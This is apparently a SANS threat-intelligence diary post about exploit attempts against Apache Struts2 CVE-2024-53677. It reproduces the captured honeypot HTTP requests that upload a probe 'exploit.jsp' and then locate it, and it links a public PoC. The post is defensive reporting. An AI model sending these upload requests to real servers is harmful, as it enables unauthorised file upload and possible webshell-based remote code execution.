Last week, Apache announced a vulnerability in Struts2 [1]. The path traversal vulnerability scored 9.5 on the CVSS scale. If exploited, the vulnerability allows file uploads into otherwise restricted directories, which may lead to remote code execution if a webshell is uploaded and exposed in the web root. I call the exploit attempts below "inspired" by this vulnerability. There are at least two vulnerabilities that could be targeted. I do not have a vulnerable system to test if the exploit will work.

Patching this vulnerability is not quite as straightforward as it should be. Apache points out:

This change isn't backward compatible as you must rewrite your actions to start using the new Action File Upload mechanism and related interceptor. Keep using the old File Upload mechanism keeps you vulnerable to this attack.

The vulnerability, CVE-2024-53677, appears to be related to CVE-2023-50164. The older vulnerability is similar, and an incomplete patch may have led to the newer issue. PoC exploits have been released (see, for example, [2]). And we are seeing active exploit attempts for this vulnerability that match the PoC exploit code. At this point, the exploit attempts are attempting to enumerate vulnerable systems:

POST /actionFileUpload HTTP/1.1
Host: [honeypot IP address]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 222
Content-Type: multipart/form-data; boundary=0abcfc26e3fa0afbd6db1ba369dfcc37

--0abcfc26e3fa0afbd6db1ba369dfcc37
Content-Disposition: form-data; name="file"; filename="exploit.jsp"
Content-Type: application/octet-stream

<% out.println("Apache Struts"); %>
--0abcfc26e3fa0afbd6db1ba369dfcc37--

This attempt uploads a one-liner script that is supposed to return "Apache Struts". Next, the attacker attempts to find the uploaded script. The exploit attempt is very close to the original PoC. Since then, a slightly improved exploit has been uploaded to the same GitHub repository.

GET /actionFileUpload/exploit.jsp HTTP/1.1
Host: [honeypot IP]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive

So far, the scans originate only from 169.150.226.162, an IP address that started scanning yesterday, initially for simple URLs like "/" and "/cbs" (likely another upload vulnerability).

[1] https://cwiki.apache.org/confluence/display/WW/S2-067
[2] https://github.com/TAM-K592/CVE-2024-53677-S2-067

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|